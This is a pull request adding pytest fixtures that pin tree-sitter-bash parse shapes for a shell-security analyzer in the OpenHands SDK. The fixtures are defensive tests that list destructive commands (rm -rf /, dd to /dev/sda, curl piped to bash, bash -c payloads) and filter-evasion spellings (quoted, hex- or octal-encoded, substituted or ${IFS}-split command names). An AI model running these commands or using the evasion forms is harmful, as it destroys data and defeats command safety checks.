### PR TITLE
test(sdk): pin shell parser node shapes

### DIFF
--- a/tests/sdk/security/test_shell_parser_node_shapes.py
+++ b/tests/sdk/security/test_shell_parser_node_shapes.py
@@ -1,0 +1,390 @@
+"""Pin tree-sitter-bash node shapes needed by shell-security migration."""
+
+from __future__ import annotations
+
+from collections.abc import Iterator
+from dataclasses import dataclass
+
+import pytest
+from tree_sitter import Node
+
+from openhands.sdk.security.shell_parser import parse
+
+
+type ExpectedChild = tuple[str, str]
+
+
+@dataclass(frozen=True)
+class ExpectedNode:
+    node_type: str
+    text: str
+    named_children: tuple[ExpectedChild, ...] | None = None
+
+
+@dataclass(frozen=True)
+class NodeShapeCase:
+    case_id: str
+    command: str
+    has_error: bool
+    root_named_children: tuple[str, ...]
+    expected_nodes: tuple[ExpectedNode, ...]
+    clean_but_opaque: bool = False
+
+
+NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
+    NodeShapeCase(
+        case_id="simple_command",
+        command="echo hello",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "echo hello",
+                (("command_name", "echo"), ("word", "hello")),
+            ),
+            ExpectedNode("command_name", "echo", (("word", "echo"),)),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="pipeline",
+        command="echo hi | wc -c",
+        has_error=False,
+        root_named_children=("pipeline",),
+        expected_nodes=(
+            ExpectedNode(
+                "pipeline",
+                "echo hi | wc -c",
+                (("command", "echo hi"), ("command", "wc -c")),
+            ),
+            ExpectedNode(
+                "command",
+                "echo hi",
+                (("command_name", "echo"), ("word", "hi")),
+            ),
+            ExpectedNode(
+                "command",
+                "wc -c",
+                (("command_name", "wc"), ("word", "-c")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="redirect",
+        command="echo hi > /tmp/out",
+        has_error=False,
+        root_named_children=("redirected_statement",),
+        expected_nodes=(
+            ExpectedNode(
+                "redirected_statement",
+                "echo hi > /tmp/out",
+                (("command", "echo hi"), ("file_redirect", "> /tmp/out")),
+            ),
+            ExpectedNode("file_redirect", "> /tmp/out", (("word", "/tmp/out"),)),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="variable_assignment",
+        command="FOO=bar echo $FOO",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "FOO=bar echo $FOO",
+                (
+                    ("variable_assignment", "FOO=bar"),
+                    ("command_name", "echo"),
+                    ("simple_expansion", "$FOO"),
+                ),
+            ),
+            ExpectedNode(
+                "variable_assignment",
+                "FOO=bar",
+                (("variable_name", "FOO"), ("word", "bar")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="rm_rf",
+        command="rm -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "rm -rf /",
+                (("command_name", "rm"), ("word", "-rf"), ("word", "/")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="path_qualified_rm",
+        command="/bin/rm -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "/bin/rm -rf /",
+                (("command_name", "/bin/rm"), ("word", "-rf"), ("word", "/")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="post_argument_rm_flag",
+        command="rm / -rf",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "rm / -rf",
+                (("command_name", "rm"), ("word", "/"), ("word", "-rf")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="dd_device_output",
+        command="dd if=/tmp/in of=/dev/sda",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "dd if=/tmp/in of=/dev/sda",
+                (
+                    ("command_name", "dd"),
+                    ("word", "if=/tmp/in"),
+                    ("word", "of=/dev/sda"),
+                ),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="fetch_to_shell_pipeline",
+        command="curl https://x | bash",
+        has_error=False,
+        root_named_children=("pipeline",),
+        expected_nodes=(
+            ExpectedNode(
+                "pipeline",
+                "curl https://x | bash",
+                (("command", "curl https://x"), ("command", "bash")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="escaped_pipe_is_word",
+        command=r"curl x\|bash",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                r"curl x\|bash",
+                (("command_name", "curl"), ("word", r"x\|bash")),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="quoted_command_name_concatenation",
+        command='r"m" -rf /',
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                'r"m"',
+                (("concatenation", 'r"m"'),),
+            ),
+            ExpectedNode(
+                "concatenation",
+                'r"m"',
+                (("word", "r"), ("string", '"m"')),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="empty_single_quoted_command_name_concatenation",
+        command="r''m -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "r''m",
+                (("concatenation", "r''m"),),
+            ),
+            ExpectedNode(
+                "concatenation",
+                "r''m",
+                (("word", "r"), ("raw_string", "''"), ("word", "m")),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="fully_quoted_command_name",
+        command="'rm' -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "'rm'",
+                (("raw_string", "'rm'"),),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="command_substitution_command_name",
+        command="$(echo rm) -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "$(echo rm)",
+                (("command_substitution", "$(echo rm)"),),
+            ),
+            ExpectedNode(
+                "command_substitution",
+                "$(echo rm)",
+                (("command", "echo rm"),),
+            ),
+            ExpectedNode(
+                "command",
+                "echo rm",
+                (("command_name", "echo"), ("word", "rm")),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="backtick_command_substitution_command_name",
+        command="`echo rm` -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "`echo rm`",
+                (("command_substitution", "`echo rm`"),),
+            ),
+            ExpectedNode(
+                "command_substitution",
+                "`echo rm`",
+                (("command", "echo rm"),),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="ansi_c_command_name",
+        command=r"$'\x72m' -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                r"$'\x72m'",
+                (("ansi_c_string", r"$'\x72m'"),),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="bash_c_raw_string_payload",
+        command="bash -c 'rm -rf /'",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "bash -c 'rm -rf /'",
+                (
+                    ("command_name", "bash"),
+                    ("word", "-c"),
+                    ("raw_string", "'rm -rf /'"),
+                ),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
+        case_id="malformed_unclosed_quote",
+        command='echo "unterminated',
+        has_error=True,
+        root_named_children=("command", "ERROR"),
+        expected_nodes=(
+            ExpectedNode("command", "echo", (("command_name", "echo"),)),
+            ExpectedNode(
+                "ERROR", '"unterminated', (("string_content", "unterminated"),)
+            ),
+        ),
+    ),
+)
+
+
+def _node_text(node: Node, source: bytes) -> str:
+    return source[node.start_byte : node.end_byte].decode()
+
+
+def _named_child_shapes(node: Node, source: bytes) -> tuple[ExpectedChild, ...]:
+    return tuple(
+        (child.type, _node_text(child, source)) for child in node.named_children
+    )
+
+
+def _iter_named_nodes(node: Node) -> Iterator[Node]:
+    if node.is_named:
+        yield node
+    for child in node.children:
+        yield from _iter_named_nodes(child)
+
+
+def _find_expected_node(root: Node, source: bytes, expected: ExpectedNode) -> Node:
+    for node in _iter_named_nodes(root):
+        if (
+            node.type == expected.node_type
+            and _node_text(node, source) == expected.text
+        ):
+            return node
+    pytest.fail(f"missing {expected.node_type!r} node spanning {expected.text!r}")
+
+
+@pytest.mark.parametrize(
+    "case",
+    NODE_SHAPE_CASES,
+    ids=[case.case_id for case in NODE_SHAPE_CASES],
+)
+def test_shell_parser_node_shapes(case: NodeShapeCase) -> None:
+    source = case.command.encode()
+    result = parse(case.command)
+    root = result.tree.root_node
+
+    assert result.has_error is case.has_error
+    assert root.type == "program"
+    assert root.start_byte == 0
+    assert root.end_byte == len(source)
+    assert (
+        tuple(child.type for child in root.named_children) == case.root_named_children
+    )
+
+    for expected in case.expected_nodes:
+        node = _find_expected_node(root, source, expected)
+        if expected.named_children is not None:
+            assert _named_child_shapes(node, source) == expected.named_children
+
+
+@pytest.mark.parametrize(
+    "case",
+    [case for case in NODE_SHAPE_CASES if case.clean_but_opaque],
+    ids=[case.case_id for case in NODE_SHAPE_CASES if case.clean_but_opaque],
+)
+def test_clean_but_opaque_commands_are_parse_successes(case: NodeShapeCase) -> None:
+    assert parse(case.command).has_error is False

--- a/tests/sdk/security/test_shell_parser_node_shapes.py
+++ b/tests/sdk/security/test_shell_parser_node_shapes.py
@@ -28,7 +28,7 @@ class NodeShapeCase:
     has_error: bool
     root_named_children: tuple[str, ...]
     expected_nodes: tuple[ExpectedNode, ...]
-    clean_but_opaque: bool = False
+    opaque_command_name: str | None = None
 
 
 NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
@@ -175,6 +175,63 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
         ),
     ),
     NodeShapeCase(
+        case_id="and_list",
+        command="rm -rf / && echo done",
+        has_error=False,
+        root_named_children=("list",),
+        expected_nodes=(
+            ExpectedNode(
+                "list",
+                "rm -rf / && echo done",
+                (("command", "rm -rf /"), ("command", "echo done")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="semicolon_sequence",
+        command="echo a; rm -rf /",
+        has_error=False,
+        root_named_children=("command", "command"),
+        expected_nodes=(
+            ExpectedNode(
+                "command",
+                "echo a",
+                (("command_name", "echo"), ("word", "a")),
+            ),
+            ExpectedNode(
+                "command",
+                "rm -rf /",
+                (("command_name", "rm"), ("word", "-rf"), ("word", "/")),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="subshell",
+        command="( rm -rf / )",
+        has_error=False,
+        root_named_children=("subshell",),
+        expected_nodes=(
+            ExpectedNode(
+                "subshell",
+                "( rm -rf / )",
+                (("command", "rm -rf /"),),
+            ),
+        ),
+    ),
+    NodeShapeCase(
+        case_id="compound_statement",
+        command="{ rm -rf /; }",
+        has_error=False,
+        root_named_children=("compound_statement",),
+        expected_nodes=(
+            ExpectedNode(
+                "compound_statement",
+                "{ rm -rf /; }",
+                (("command", "rm -rf /"),),
+            ),
+        ),
+    ),
+    NodeShapeCase(
         case_id="escaped_pipe_is_word",
         command=r"curl x\|bash",
         has_error=False,
@@ -186,7 +243,6 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("command_name", "curl"), ("word", r"x\|bash")),
             ),
         ),
-        clean_but_opaque=True,
     ),
     NodeShapeCase(
         case_id="quoted_command_name_concatenation",
@@ -205,7 +261,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("word", "r"), ("string", '"m"')),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name='r"m"',
     ),
     NodeShapeCase(
         case_id="empty_single_quoted_command_name_concatenation",
@@ -224,7 +280,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("word", "r"), ("raw_string", "''"), ("word", "m")),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name="r''m",
     ),
     NodeShapeCase(
         case_id="fully_quoted_command_name",
@@ -238,7 +294,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("raw_string", "'rm'"),),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name="'rm'",
     ),
     NodeShapeCase(
         case_id="command_substitution_command_name",
@@ -262,7 +318,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("command_name", "echo"), ("word", "rm")),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name="$(echo rm)",
     ),
     NodeShapeCase(
         case_id="backtick_command_substitution_command_name",
@@ -281,7 +337,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("command", "echo rm"),),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name="`echo rm`",
     ),
     NodeShapeCase(
         case_id="ansi_c_command_name",
@@ -295,7 +351,7 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("ansi_c_string", r"$'\x72m'"),),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name=r"$'\x72m'",
     ),
     NodeShapeCase(
         case_id="ansi_c_octal_command_name",
@@ -309,7 +365,62 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 (("ansi_c_string", r"$'\162\155'"),),
             ),
         ),
-        clean_but_opaque=True,
+        opaque_command_name=r"$'\162\155'",
+    ),
+    NodeShapeCase(
+        case_id="simple_expansion_command_name",
+        command="$CMD -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "$CMD",
+                (("simple_expansion", "$CMD"),),
+            ),
+            ExpectedNode("simple_expansion", "$CMD", (("variable_name", "CMD"),)),
+        ),
+        opaque_command_name="$CMD",
+    ),
+    NodeShapeCase(
+        case_id="braced_expansion_command_name",
+        command="${CMD} -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "${CMD}",
+                (("expansion", "${CMD}"),),
+            ),
+            ExpectedNode("expansion", "${CMD}", (("variable_name", "CMD"),)),
+        ),
+        opaque_command_name="${CMD}",
+    ),
+    NodeShapeCase(
+        case_id="ifs_expansion_command_name_concatenation",
+        command="rm${IFS}-rf${IFS}/",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                "rm${IFS}-rf${IFS}/",
+                (("concatenation", "rm${IFS}-rf${IFS}/"),),
+            ),
+            ExpectedNode(
+                "concatenation",
+                "rm${IFS}-rf${IFS}/",
+                (
+                    ("word", "rm"),
+                    ("expansion", "${IFS}"),
+                    ("word", "-rf"),
+                    ("expansion", "${IFS}"),
+                    ("word", "/"),
+                ),
+            ),
+        ),
+        opaque_command_name="rm${IFS}-rf${IFS}/",
     ),
     NodeShapeCase(
         case_id="bash_c_raw_string_payload",
@@ -327,7 +438,6 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
                 ),
             ),
         ),
-        clean_but_opaque=True,
     ),
     NodeShapeCase(
         case_id="malformed_unclosed_quote",
@@ -397,8 +507,23 @@ def test_shell_parser_node_shapes(case: NodeShapeCase) -> None:
 
 @pytest.mark.parametrize(
     "case",
-    [case for case in NODE_SHAPE_CASES if case.clean_but_opaque],
-    ids=[case.case_id for case in NODE_SHAPE_CASES if case.clean_but_opaque],
+    [case for case in NODE_SHAPE_CASES if case.opaque_command_name is not None],
+    ids=[
+        case.case_id
+        for case in NODE_SHAPE_CASES
+        if case.opaque_command_name is not None
+    ],
 )
-def test_clean_but_opaque_commands_are_parse_successes(case: NodeShapeCase) -> None:
-    assert parse(case.command).has_error is False
+def test_opaque_command_names_are_not_plain_words(case: NodeShapeCase) -> None:
+    assert case.opaque_command_name is not None
+
+    source = case.command.encode()
+    result = parse(case.command)
+    root = result.tree.root_node
+    command_name = _find_expected_node(
+        root, source, ExpectedNode("command_name", case.opaque_command_name)
+    )
+
+    assert result.has_error is False
+    assert command_name.named_children
+    assert all(child.type != "word" for child in command_name.named_children)

--- a/tests/sdk/security/test_shell_parser_node_shapes.py
+++ b/tests/sdk/security/test_shell_parser_node_shapes.py
@@ -298,6 +298,20 @@ NODE_SHAPE_CASES: tuple[NodeShapeCase, ...] = (
         clean_but_opaque=True,
     ),
     NodeShapeCase(
+        case_id="ansi_c_octal_command_name",
+        command=r"$'\162\155' -rf /",
+        has_error=False,
+        root_named_children=("command",),
+        expected_nodes=(
+            ExpectedNode(
+                "command_name",
+                r"$'\162\155'",
+                (("ansi_c_string", r"$'\162\155'"),),
+            ),
+        ),
+        clean_but_opaque=True,
+    ),
+    NodeShapeCase(
         case_id="bash_c_raw_string_payload",
         command="bash -c 'rm -rf /'",
         has_error=False,


### PR DESCRIPTION
<!-- Keep this PR as draft until it is ready for review. -->

<!-- AI/LLM agents:
Do not edit the HUMAN section or human-tested checkbox.
In the AGENT section and the template fields below, provide evidence that the
code runs properly end-to-end. Just running unit tests is NOT sufficient. Explain
exactly what command you ran and include logs, screenshots, or reproduction notes.
-->

HUMAN:

<!--
Human author: please replace this comment with a short note (at least 20 visible
characters) before marking ready for review.
AI agents must not edit this section.
-->

This PR is a tests-only baseline for the shell parser migration.

- [x] A human has tested these changes.

AGENT:

---

## Why

PR-C for #2721 pins the concrete `tree-sitter-bash` grammar shapes that the
next AST migration PRs will depend on. This keeps PR-D helper work grounded in
observed parser output instead of guessed node names, while preserving analyzer
behavior.

## Summary

- Add a parser node-shape fixture table for simple commands, pipelines,
  redirects, assignments, structural traversal wrappers, destructive shell
  patterns, opaque command-name constructs, `bash -c`, and malformed shell.
- Assert `ParseResult.has_error`, root node shape, byte-span coverage, and key
  named child node shapes for each fixture.
- Replace the documentary opaque slice with an assertion that opaque
  command-name fixtures are not plain `word` command names.
- Keep the change tests-only: no analyzer migration, no parser helper API, and
  no production behavior change.

## Issue Number

Refs #2721

## How to Test

I ran the focused parser and analyzer-serialization validation target:

```bash
uv run pytest tests/sdk/security/test_shell_parser.py tests/sdk/security/test_shell_parser_node_shapes.py tests/sdk/security/defense_in_depth/test_serialization.py
```

Result: 77 tests passed.

I also ran the file-scoped pre-commit hooks:

```bash
uv run pre-commit run --files tests/sdk/security/test_shell_parser_node_shapes.py
```

Result: Ruff format, Ruff lint, pycodestyle, pyright, import dependency rules,
and tool subclass registration all passed.

For roadmap fit, review feedback led to pinning missing quoted command-name
variants, both ANSI-C hex and octal forms, structural traversal wrappers
(`&&`, `;`, subshell, and compound statement), and variable-expansion command
names (`$CMD`, `${CMD}`, and `rm${IFS}-rf${IFS}/`).

## Video/Screenshots

Not applicable; this is a parser test baseline with no UI surface.

## Type

- [ ] Bug fix
- [ ] Feature
- [ ] Refactor
- [ ] Breaking change
- [x] Docs / chore

## Notes

This PR intentionally does not migrate `PatternSecurityAnalyzer` or
`PolicyRailSecurityAnalyzer`, add public parser helper APIs, change
`UNKNOWN`/risk semantics, or modify dependencies.
